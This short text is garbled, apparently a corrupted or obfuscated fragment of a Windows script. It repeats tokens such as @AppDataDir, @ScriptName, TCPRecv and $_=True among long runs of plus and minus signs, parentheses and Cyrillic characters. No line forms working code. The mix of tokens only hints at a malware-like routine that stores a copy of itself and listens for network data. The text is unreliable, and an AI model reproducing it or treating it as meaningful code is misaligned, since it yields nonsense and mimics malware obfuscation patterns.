B(((((((((((+++++++++++++яяяяяяяп
$_=$_
IsNumber$_=+++++(E(((---------------------УТТЩ-++++++++++++++++(EStep(((-------------------------++++++(E((7
$_=6
$_=(((((+++++U(""""""""""_(8)""""""----------------ХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ•------@AppDataDir-------------------------------(((((((((((++++++++++TCPRecv++++$_=True
$_=$_
$_=+++++@ScriptName--------------(---------------ХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ+---@AppDataDir---------+++$_=True
$_=$_
$_=+(E(((---------------ХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХЭХХХХХХХ+---@AppDataDir---------+++$_=True
$_:=$_
$_=+(E(((---------------ХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХЭХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ------@AppDataDir--------------------((6
$_=6
$_=(((((+++++U(""""""""""""";"""----------2------ХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ•------@AppDataDir---------------------------------яяяяяяя------------------++TCPRecv++++$_=True
$_=$_
$_=+++++(E(((-----------ХХХХХХХХ-------------------++------@AppDataDir--------((ЧЧЧЧЧЧЧЧ++++++++++TCPRecv++++$_=True
$_=$_
$_=+++++@ScriptName--------------(---------------ХХХХХХХХХХХХХХХХХХХХХХ+---@AppDataDir---------+++$_=True
$_=$_
$_=+++++(E(((---------------------УОТЩ-++ХХХХХХХХХХХХХХХХХХХХХХХХХХХ------@AppDataDir-------------------------------------------------УТТЩ-++--------------------------------------+++-@AppDataDir---------++++++--------@AppDataDir----------------------((6
$_=6
$_=(((--